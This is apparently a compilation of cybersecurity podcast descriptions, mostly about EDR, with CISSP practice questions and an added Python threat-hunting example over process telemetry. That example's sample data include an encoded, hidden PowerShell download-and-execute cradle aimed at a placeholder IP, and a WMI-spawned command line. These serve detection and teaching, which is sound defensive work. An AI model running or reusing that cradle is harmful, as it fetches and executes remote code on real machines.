We are in an era of increasing numbers of IoT devices and the introduction of industrial IoT devices into manufacturing environments. How do you secure this equipment when it is mixed with legacy equipment that has been running for 10, 20 or more years in production? William Noto, Global Director of Operational Technology Product Marketing at Fortinet, discusses concerns impacting manufacturing organizations when introducing IoT devices to the environment, the risks that arise when modern technology is mixed with legacy technology, and much more.
Identity Detection and Response (IDR) is a new security category that focuses on protecting credentials, privileges, cloud entitlements, and the systems that manage them across endpoints, Active Directory, and the Cloud through visibility and early detection of attacks targeting identities. Attackers consider enterprise identities as high-value targets and attempt to compromise them early in the attack to access the network and gain privileges to essential production assets. Current identity security focuses on safeguarding privileged credentials in PAM solutions or securing the authentication process with MFA and IAM solutions, but these measures leave gaps that attackers can exploit. While current security solutions like Endpoint Detection and Response (EDR), Extended Detection and Response (XDR), Network Detection and Response (NDR), and others provide specific functions for defending the network, they do not focus on identities. EDR focuses on preventing the initial compromise, while XDR and NDR try to detect attacks as they expand from the beachhead. Attacks targeting enterprise identities can evade detection from these security controls, but IDR solutions can bridge these detection gaps to identify such attacks. Join Joseph Salazar from Attivo Networks as he discusses the importance of IDR to modern enterprise security. Segment Resources: https://attivonetworks.com/documentation/Attivo_Networks-Identity_Detection_Response.pdf https://attivonetworks.com/what-is-identity-detection-and-response-idr/ https://attivonetworks.com/solutions/identity-security/ This segment is sponsored by Attivo Networks. Visit https://securityweekly.com/attivonetworks to learn more about them! Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw244
On this week's show Patrick Gray and Adam Boileau discuss recent security news, including: more info on the Belarusian Cyber Partisans; how infosec overhyped election security risks; is data ransoming dying?; all about the Azure Cosmos DB drama; much, much more… In this week's sponsor interview Airlock Digital's Daniel Schell and David Cottingham join the show to talk about EDR bypasses. They are a thing. Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that's your thing.
Show notes:
Belarusian hackers are turning the country's surveillance state against it | MIT Technology Review
A new wave of Hacktivists is turning the surveillance state against itself - The Record by Recorded Future
Trump conspiracies strain election cybersecurity experts
T-Mobile CEO apologizes after hacker stole millions of users' personal information
Bangkok Air confirms passenger PII leak after ransomware attack - The Record by Recorded Future
Leaked Guntrader firearms data file shared. Worst case scenario? Criminals plot UK gun owners' home addresses in Google Earth • The Register
Hackers steal $29 million from crypto-platform Cream Finance - The Record by Recorded Future
U.S. spy agencies rule out possibility the coronavirus was created as a bioweapon, say origin will stay unknown without China's help - The Washington Post
Australia's 'hacking' Bill passes the Senate after House made 60 amendments | ZDNet
White House rolls out pipeline, supply chain security initiatives as companies pledge billions in cyber spending
CISA adds single-factor authentication to its catalog of 'Bad Practices' - The Record by Recorded Future
DHS urges Microsoft customers to update Azure to avoid security flaw
Microsoft Azure vulnerability exposed thousands of cloud databases
CISA and the FBI warn of ransomware gangs' tendency of launching attacks over holidays and weekends - The Record by Recorded Future
FBI warns that Hive ransomware hackers are calling victims by phone
Deserialization bug in TensorFlow machine learning framework allowed arbitrary code execution | The Daily Swig
A Dark Web Murder-For-Hire Scammer Became An FBI Informant
WhatsApp, Facebook, and Twitter fined for not storing user data inside Russia - The Record by Recorded Future
A Bad Solar Storm Could Cause an 'Internet Apocalypse' | WIRED
Trial & Error in Kuwait - CyberScoop
How Data Brokers Sell Access to the Backbone of the Internet
Man Robbed of 16 Bitcoin Sues Young Thieves' Parents – Krebs on Security
Front Matter | Understanding and Managing Risk in Security Systems for the DOE Nuclear Weapons Complex: (Abbreviated Version) | The National Academies Press
JCP | Free Full-Text | An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors | HTML
Attackers are always ahead of the game, and today you need more than a lock on your front door. Modern security requires organizations to think outside the box, re-architect their environment, and be able to scale more efficiently and effectively. In this first episode, we sat down with Brad LaPorte to discuss Endpoint Detection and Response (EDR) in depth. Brad has spent time in US Cyber Intelligence, at large technology companies like IBM and at the research firm Gartner, and today is a partner at High Tide Advisors, a firm specializing in go-to-market consulting. Topics discussed in this episode: How Brad has seen endpoint detection and response evolve over the last 5 years. How attackers are always well financed and resourced. Organizations' struggles with application control. What caused the shift from AV to EDR products and tools. Why detection as code is critical, for many reasons. The biggest challenges Brad has seen when deploying EDR in a large organization. The importance of educating your leadership, having a proper plan and use case, and assessing your operational readiness when implementing EDR. Recommendations for engineers looking to build their own version of an EDR platform. Tools and technologies that Brad is paying attention to, like zero trust architecture. 3 pieces of advice for security teams looking to succeed at EDR at scale.
In this episode, our host, FalconSpy, sits down with Topher Timzen (@ttimzen) and Michael Leibowitz (@r00tkillah), two red teamers from Oracle. They discuss a number of topics, including Topher's and Michael's DEF CON 27 Endpoint Detection & Response presentation. They dive into how they got into the infosec field and what makes them so passionate about it. Find out their answer to the age-old question: what's the difference between red teaming and pentesting? Plus, get their take on certifications and what you really need these days to be successful. Finally, as BSides Portland organizers, Topher and Michael give you a rundown on the process of developing a security conference. Enjoy!
In episode 51 of The Cyber5, we are joined by Chris Castaldo. Chris is the Chief Information Security Officer for CrossBeam and has been CISO for a number of emerging technology companies. In this episode, we talk about his newly released book, "Startup Secure", and how growth companies can implement security at different funding stages. He also talks about the reasons security professionals should want to be a start-up CISO at a growing technology company and how success can be defined for a first-time CISO. We also talk about how start-up companies can avoid ransomware events in a landscape that is not only constantly changing but also gives little advantage to defenders of small and medium-sized enterprises. Two Topics Covered in this Episode: 4 Security Lessons for Founders of Start-up Technology Companies. When a B2B company is pre-seed or before Series A funding, customers might give it leeway for lax cybersecurity controls. However, after an A round, policies, certifications (SOC 2 or ISO 27001) and procedures will be required to ensure customer data is kept safe. A B2C technology company might not be asked by the public for certifications, but auditors and regulators may ask. Basic policies include: Single Sign-On (for example Okta authentication) into applications, cloud and workstations; password manager deployment (LastPass or 1Password); encryption at rest and in transit; vulnerability scanning. Combating Ransomware from the Inside-Out Approach and Integrating Threat Intelligence. Blocking and tackling from the inside out to get in front of ransomware is challenging. The simple items to tackle are the following: auto-updates for patch management on operating systems; Endpoint Detection and Response products; proper asset management to have full visibility of all network devices and services. Once resilience and compliance controls are in place and an organization can bounce back from an incident in a timely manner, adversary insight via threat intelligence is a logical next step.
While new technologies are constantly being developed to fight cybercrime and strengthen cybersecurity systems, much of cybersecurity is left yawning. New additions to technologies such as Endpoint Detection and Response (EDR), while effective, are not bringing about the level of change we need to see if we want to ensure safety while reducing employees' workloads. EDR, for instance, often sends alerts to employees notifying them that unexpected activity needs to be investigated. How many emails do we receive a day from job recruiters, collaboration tools, social media tools and others? Of course investigating cyberthreats is important, but it's hard to care about yet another alert after receiving your 20th promotional email of the week from your local pizzeria. Beyond this, there are already serious, undeniable threats in cyberspace that cannot be ignored. With hundreds of devices in every organisation, there are hundreds of attack vectors. Yes, certain cybersecurity technologies exist, but adversaries always develop new attack methods. So it's worth keeping up to date with the latest news in AI in order to find a technology that can learn these methods and grow over time. News in AI proves more and more interesting every day, with new technologies being applied to protect security interests. For those of us already working in cybersecurity, machine learning is old news, but how many organisations are using deep learning-based prevention? According to Deep Instinct, deep learning-based prevention helps us to surpass "The Cybersecurity Trade-Off", where organisations prevent threats but also receive high volumes of false positives. This helps to prevent a 'boy who cried wolf' situation and instead brings real, analysed threats to your attention. Delivering us the latest news in AI is Shimon Noam Oren, VP Research & Deep-Learning at Deep Instinct. In this podcast, he delves into the 'prevention trade-off dilemma', the problems with cybersecurity prevention software, the ins and outs of deep learning and how it can provide a more robust cybersecurity methodology.
In episode 50 of The Cyber5, we are joined by Paul Kurtz. Paul's career includes serving as Director of Counter-Terrorism, Senior Director for Cyber Security, and Special Assistant to the President of the United States for Critical Infrastructure Protection. He was previously the CEO of the threat intelligence platform TrueStar and is now the Chief Cybersecurity Advisor, Public Sector at Splunk. In this episode, we discuss the Biden Administration's executive order for cybersecurity and how it impacts the public and private sector in relation to intelligence management. We also talk about an inside-out network approach and the criticality of cloud migration in detecting cyber threats at scale. We further discuss the value of threat intelligence and the importance of integration with enterprise systems. 6 Topics Covered in this Episode: Three Key Points of the Executive Order: While important topics such as zero trust, identity and access management and third-party risk management get the major attention, three important but often overlooked points covered in the executive order are cloud transition, information sharing, and data collection and preservation. From an intelligence management and security perspective, the migration of the US public sector to the cloud, coupled with information sharing and data preservation, are the most important actions to reduce mean time to detect and alert, mean time to respond, and mean time to remediate. Need for Automation of Internal and External Telemetry: Endpoint Detection and Response, next generation anti-virus, next generation firewalls, and IAM (identity and access management) are examples of the advancement in enterprise security solutions. These technologies are now being augmented by threat intelligence solutions. Integrating and automating this suite of advanced capabilities is key to optimizing intelligence and defending against increasingly sophisticated threat actors. MSSPs are Critical to Protecting SMBs: MSSPs must integrate their alerting and detection ability with the cloud in order to protect small and medium-sized businesses. Small and medium-sized businesses don't typically have the security teams or expertise to patch, remediate, and threat hunt. MSSPs with MDR capability can effectively serve this market. Threat Intelligence Must Be Integrated to Augment Existing Telemetry: Threat intelligence must be actionable. A key step towards actionability is integration into a ticketing system, a Security Information and Event Management (SIEM) tool, a Threat Intelligence Platform, or an Endpoint Detection and Response solution. Behavior is King for Appropriate Context: What matters is the ability to detect malicious behavior from actors inside a network and initiate an appropriate response. This is not possible without the context provided by cloud integration, log aggregation, a retrospective "look back" capability, and the integration of external data with internal telemetry. US Civilian Agencies Need a Roadmap for Cloud Integration: If the Central Intelligence Agency can embrace the cloud, so can other agencies. A federal roadmap is urgently needed to defend against attacks by sophisticated adversaries.
In this episode I have a special co-host, Natasha Young. Natasha is my WomSA security mentee. She and I had a chance to speak with Stephanie Aceves about endpoint solutions as a security AND business tool. Stephanie is a Threat Response Subject Matter Expert Lead at Tanium. Talking Points: What's the difference between EDR and what Tanium does? Specifically, how can endpoint management systems close the gap between traditional detection systems and automation while still being able to manage time sensitivity? What are some of the lessons learned from recent cyber attacks, such as SolarWinds, Microsoft Exchange and the Colonial Pipeline, where a tool like Tanium (endpoint management) could have prevented or mitigated the damage? President Biden signed an executive order this past May to improve cybersecurity in America. The executive order talks about Improving Detection of Cybersecurity Incidents on Federal Government Networks: "The Federal government should lead in cybersecurity, and strong, Government-wide Endpoint Detection and Response (EDR) deployment coupled with robust intra-governmental information sharing are essential." Where can Tanium be used in relation to the statements made around EDR? What does this executive order mean for Tanium, and has the company adopted this as an opportunity to help other companies? Podcast Sponsor: This episode was sponsored by Tanium. Tanium is an endpoint security solution and they are based out of Kirkland, Washington. As always, proceeds from the sponsorship will go towards charities in Michigan.
PhoneBoy talks with Product Manager Yoni Nave about the evolution from Endpoint Detection and Response (EDR) to Extended Detection and Response (XDR).
PhoneBoy talks with Product Manager Yoni Nave to answer the question What is Endpoint Detection and Response?
Today I will discuss: 1. What is Endpoint Detection & Response (EDR)? 2. How does EDR combat new threats? 3. Why is EDR better than traditional endpoint security? 4. What kind of response can EDR generate? Watch
A few short years ago, penetration testers did not have to work too hard for their malware command channels to execute. Fast forward to today in the age of Endpoint Detection and Response, User Behavior Analytics, and advanced built-in O/S defenses, your standard toolkit for malware generation/execution does not work anymore. All is not lost! […] The post Webcast: Move Aside Script Kiddies – Malware Execution in the Age of Advanced Defenses appeared first on Black Hills Information Security.
In this episode Adelmo helps us understand how an antivirus works and how the transformation into Endpoint Detection and Response (EDR) has made antivirus products ever more intelligent and capable.
Habr's new podcast, called PRO, is the audio version of our video casts on YouTube. It has new hosts, new topical subjects and new guests. There are always two guests, so that a question can be looked at from different points of view and a professional opinion formed. The video cast is here: https://u.tmtm.ru/habrpro
1:45 Modern cyberattacks: types, stages, examples
10:35 How not to become a victim: precautions for private individuals
15:50 Automatic router firmware updates: good or bad?
16:40 Why attacks on industrial enterprises are more dangerous than attacks on financial ones
24:00 Thinking like a cybercriminal: how security specialists look for vulnerabilities in corporate networks, with interesting cases
29:50 Specifics of protecting the Russian defence industry, and domestic developments in information security
35:00 Why phishing is still effective
39:30 The dilemma between a complex password you may forget and a simple one that is more likely to be cracked. How and where to store passwords?
46:10 How to protect accounts whose authorization is tied to your mobile phone
47:50 The market for information security specialists, their qualifications and salaries
55:50 Are Security Operations Centers needed? And antivirus? Why EDR (Endpoint Detection and Response) solutions are growing in popularity
1:00:50 What companies without a dedicated security specialist should do
1:09:15 Is it really more convenient to use products from one vendor than from several?
1:14:30 Scam calls: what to do
1:17:05 How AI is used in information security
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare for and pass the CISSP exam, while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge, built over years of training people in cybersecurity, to provide superior training. In this episode Shon provides CISSP study and training for Domain 4 (Communication and Network Security) of the CISSP exam. His knowledge will provide the skills needed to pass the CISSP. BTW - Get access to all my Free Content and CISSP Training Courses here at: https://shongerber.com/ Available Courses: CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o
CISSP Exam Questions
Question 159: Vulnerabilities and risks are evaluated based on their threats against which of the following? A) One or more of the CIA Triad principles B) Data usefulness C) Due care D) Extent of liability
Answer: A) One or more of the CIA Triad principles. Vulnerabilities and risks are evaluated based on their threats against one or more of the CIA Triad principles. https://www.brainscape.com/subjects/cissp-domains
Question 160: While performing a risk analysis, you identify a threat of fire and a vulnerability because there are no fire extinguishers. Based on this information, which of the following is a possible risk? A) Virus infection B) Damage to equipment C) System malfunction D) Unauthorized access to confidential information
Answer: B) Damage to equipment. The threat of a fire and the vulnerability of a lack of fire extinguishers lead to the risk of damage to equipment. https://www.brainscape.com/subjects/cissp-domains
Question 161: What process or event is typically hosted by an organization and is targeted to groups of employees with similar job functions? A) Education B) Awareness C) Training D) Termination
Answer: C) Training. Training is teaching employees to perform their work tasks and to comply with the security policy. Training is typically hosted by an organization and is targeted to groups of employees with similar job functions. https://www.brainscape.com/subjects/cissp-domains
Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS: ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources Online Article https://www.cio.com/article/2381021/best-practices-how-to-create-an-effective-business-continuity-plan.html
18/11/2019. On Monday 18 November, in the cybersecurity slot of Capital Radio's AfterWork, we had a special session in which we spoke with several companies that build solutions to defend organizations and citizens against cyberattacks. Out of the broad catalogue of solutions they all offer, we wanted to focus on EDR (Endpoint Detection and Response) solutions. For that we were joined by experts such as Ángel Ortiz of McAfee, Jesús Díaz of Palo Alto Networks, Alberto Tejero of Panda Security and Ivan Mateos of Sophos. With all of them we discussed the advantages EDR brings when protecting an organization or people's personal computers. +info: https://psaneme.com/2019/11/22/edr-protegiendo-activamente/ +info: https://psaneme.com/radio/
Splunk [Security, Compliance and Fraud Track] 2019 .conf Videos w/ Slides
Going beyond basic perimeter defense, Threat Hunting cuts through the noise of endpoint telemetry and anti-virus data to find nation-state level Advanced Persistent Threats (APTs) that hide below the alert threshold. We will demonstrate, through 4 hunt analytic use cases, how to overcome the legacy challenge of relying on Packet Capture (PCAP) data to detect adversaries, highlighting the need to transform Hunt operations by combining Endpoint Detection and Response (EDR) telemetry data with knowledge of APT behavior to find hidden adversaries. This talk will provide a framework for planning and executing hunts, demonstrate why focusing on EDR telemetry data can add additional value over and beyond traditional network data, and how to strengthen hunting through a Purple Team approach. Speaker(s) Max Moerles, Cyber Threat Analyst , Booz Allen Hamilton Jay Novak, Threat Hunt Team Lead, Booz Allen Hamilton Slides PDF link - https://conf.splunk.com/files/2019/slides/SEC1250.pdf?podcast=1577146224 Product: Splunk Enterprise Track: Security, Compliance and Fraud Level: Good for all skill levels
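To make concrete what "hunt analytics over EDR telemetry" looks like in practice, here is an added example that is not code from the talk or its slides. It runs three analytics of the kind a hunt team writes against process-creation events (a parent/child signature for Office spawning a script host, frequency analysis of parent/child pairs across the fleet, and decoding of PowerShell -EncodedCommand blobs so the real command is visible). The event shape, the host names, the download-cradle payload and all sample events are constructed for the example and are assumptions, not data from the session.

```python
"""Hunt analytics over EDR process-creation telemetry (added example).

The event fields (host, parent image, child image, command line) are an
assumption modelled on typical EDR / Sysmon process-create records.
"""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str      # endpoint that reported the event
    parent: str    # parent process image name, lower-case
    image: str     # child process image name, lower-case
    cmdline: str   # child command line


# Constructed payload of the kind an attacker hides behind -EncodedCommand.
# 203.0.113.5 is a documentation (TEST-NET-3) address, not a real host.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed sample telemetry: benign pairs repeated across hosts, plus two
# events that each appear on a single host only.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcEvent("ws02", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcEvent("ws03", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcEvent("ws04", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcEvent("ws01", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("ws02", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("ws03", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("ws04", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("ws01", "explorer.exe", "winword.exe", "winword.exe report.docx"),
    ProcEvent("ws02", "explorer.exe", "winword.exe", "winword.exe invoice.docm"),
    ProcEvent("ws03", "explorer.exe", "winword.exe", "winword.exe notes.docx"),
    # Macro-enabled document spawning an encoded PowerShell download cradle.
    ProcEvent("ws02", "winword.exe", "powershell.exe",
              f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"),
    # Remote WMI execution landing as WmiPrvSE.exe -> cmd.exe on one host.
    ProcEvent("ws03", "wmiprvse.exe", "cmd.exe", "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}


def office_spawning_script_host(events):
    """Analytic 1: known-bad parent/child relationship (Office -> shell or script host)."""
    return [e for e in events if e.parent in OFFICE_APPS and e.image in SCRIPT_HOSTS]


def rare_parent_child(events, max_hosts=1):
    """Analytic 2: frequency analysis ('stacking') of parent -> child pairs.

    Legitimate pairs recur across the fleet; a pair seen on only a few hosts
    deserves an analyst's attention even when no signature matches it.
    """
    hosts_per_pair = defaultdict(set)
    for e in events:
        hosts_per_pair[(e.parent, e.image)].add(e.host)
    return sorted(pair for pair, hosts in hosts_per_pair.items() if len(hosts) <= max_hosts)


# Matches PowerShell's -e / -ec / -enc / -EncodedCommand switch and the Base64 blob after it.
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_powershell(cmdline):
    """Analytic 3: recover the command hidden behind -EncodedCommand.

    PowerShell expects Base64 of UTF-16LE text. Returns None when the command
    line has no such switch or the blob does not decode cleanly.
    """
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def run_hunt(events):
    """Run all three analytics; returns (host, analytic, detail) tuples for triage."""
    findings = []
    for e in office_spawning_script_host(events):
        findings.append((e.host, "office-spawns-script-host", f"{e.parent} -> {e.image}"))
    for parent, child in rare_parent_child(events):
        findings.append(("fleet", "rare-parent-child", f"{parent} -> {child}"))
    for e in events:
        decoded = decode_encoded_powershell(e.cmdline)
        if decoded is not None:
            findings.append((e.host, "encoded-powershell", decoded))
    return findings


if __name__ == "__main__":
    for host, analytic, detail in run_hunt(SAMPLE_EVENTS):
        print(f"{host:6} {analytic:26} {detail}")
```

The stacking analytic is the one that needs no prior knowledge of the adversary: it only needs the fleet-wide view that EDR telemetry gives and PCAP does not. Against real data, raise `max_hosts` and exclude pairs already on an allow-list, otherwise every newly deployed application on a pilot host shows up as a finding.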
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Phishing E-Mail Spoofing SPF Protected Domain https://isc.sans.edu/forums/diary/Phishing+email+spoofing+SPFenabled+domain/25426/ Purchased Domain Arrives with Paypal Accounts Linked to it https://www.theregister.co.uk/2019/10/17/paypal_account_domain/ Typosquatting Attacks Affect 2020 Presidential Election https://www.digitalshadows.com/blog-and-research/typosquatting-and-the-2020-u-s-presidential-election/ STI Student: Christopher Hurless Exploring Osquery, Fleet, and Elastic Stack as an Open-source solution to Endpoint Detection and Response https://www.sans.org/reading-room/whitepapers/detection/paper/39165
Endpoint Detection & Response is quickly becoming the standard in cybersecurity. In this episode, Grant Haroway, Lead Investigator in Content Security's Digital Forensics and Incident Response Team, discusses the benefits of Endpoint Detection and Response, and how an EDR solution works in an incident response scenario.
In this episode, CBI's Dave Glenn, Dan Gregory and Bjorn Olsen discuss Advanced EDR with our partners Adam Hogan and Rick Lane from CrowdStrike and Erik Wille from our customer Penske.
This is the ninth episode of our Avanet podcast on all things Sophos. In this episode we talk, among other things, about the SFOS MR5 and MR6 releases, clear up important questions about Central EDR licences and report on a few new developments on our website.
## XG Firewall
With version 17.5 MR5 Sophos added APX 120 support, and MR6 closed important security holes in the Exim mail server. Action is still needed for the TCP SACK PANIC vulnerability, for which Sophos will ship a patch in July. The upcoming SFOS v18 requires at least 4GB of RAM, so all users who hold a software licence for "1 CPU 2GB RAM" get a free upgrade to "1 CPU 4GB RAM". For the same reason [the XG 85 and XG 105 hardware products have already been discontinued](https://www.avanet.com/blog/sophos-xg-85-und-xg-105-end-of-sale/).
## Sophos Central
In the Sophos Central part of this episode we talk about an update to the Central Firewall Manager, which can now also take backups of the firewalls. We also answer the question of [what Endpoint Detection and Response (EDR) does for you](https://www.avanet.com/blog/wozu-endpoint-detection-and-response-edr/) and when you need it. While we are on the subject, we also explain that [mixed licences are no longer possible with EDR](https://www.avanet.com/blog/sophos-central-server-keine-mischlizenzen-mit-edr/). The acquisition of the company "Rook Security" at the beginning of June also comes up briefly.
## Avanet Shop
We have once again made a few changes and improvements to our website, which we discuss in detail in this episode. You can also find all the information in this blog post: [Avanet Shop: switch to gross prices and project registration](https://www.avanet.com/blog/avanet-shop-umstellung-auf-bruttopreise-und-projektmeldung/)
In this episode we look at EDR, or Endpoint Detection and Response. We dig into its past and look at its evolution to what we see today, as well as exploring how it can work for different organisations. Host Michael Bird is joined by Adam Louca, Softcat's chief technologist for security, as well as Russell Humphries, VP of product management for the endpoint security group at Sophos, to discuss the pros and cons that come with the newest generation of endpoint protection software. Further Links: Softcat's IT Priorities; IT Intelligence; Cyber Security; Hybrid Infrastructure; Digital Workspace; Get in Touch. https://www.softcat.com/podcasts/explain-it/s02e12 https://twitter.com/softcat https://www.linkedin.com/company/softcat/
Security Current podcast - for IT security, networking, risk, compliance and privacy professionals
The business of information security is tough: the bad guys only need to get it right once, while the good guys have to get it right all the time. One hundred percent protection of all endpoints is not possible, and eventually, there will be an infection. The question is, how do you react as quickly as you can to detect the most important infections before they wreak havoc in your system? In this Bitdefender-sponsored podcast, IBM Cloud and SaaS Operations Global CISO David Cass talks to Harish Agastya, VP of Enterprise Solutions at Bitdefender, about the challenges in Endpoint Detection and Response (EDR). They explore how EDR is one of many layers of protection and how it works best when it relies on the intelligence of prior layers. Harish emphasizes how the reduction of noise generated by these often-disparate solutions is crucial and how such solutions need to be available to all players in the market – not just to big organizations with deep pockets.
Many roads lead to Active Directory insecurity, such as e-mail phishing and letting go of your foothold, and all of it can be done without the attacker getting caught. These problems can be addressed with endpoint detection, by correlating your network, endpoint and log events, and by using encryption. Paul and John discuss their theories on Active Directory and what to do to save yourself from being hacked! Full Show Notes: https://wiki.securityweekly.com/ES_Episode73
Enterprises are increasingly under threat from sophisticated attacks. In fact, threats dwell in an organization's environment for an average of 190 days! Security teams also face multiple challenges when attempting to detect and fully expose the extent of an advanced attack. Symantec's anticipated evolution to full-fledged Endpoint Detection and Response (EDR) is here to address this. There are a lot of enhancements in this latest version of Symantec's ATP, but we will focus on these 5 highlights in this video:
1) Endpoint Activity Recorder - Continuous visibility across SEP endpoints
2) Event search - Search, filter and retrieve events for specific endpoints
3) File-less threat detection - Detect and view suspicious scripts and memory exploits
4) Hybrid sandboxing - Detonate files on-premises or in the cloud
5) Enhanced APIs and integrations with Splunk, ServiceNow, QRadar - Ease custom integrations and leverage pre-built components
Learn more at itsdelivers.com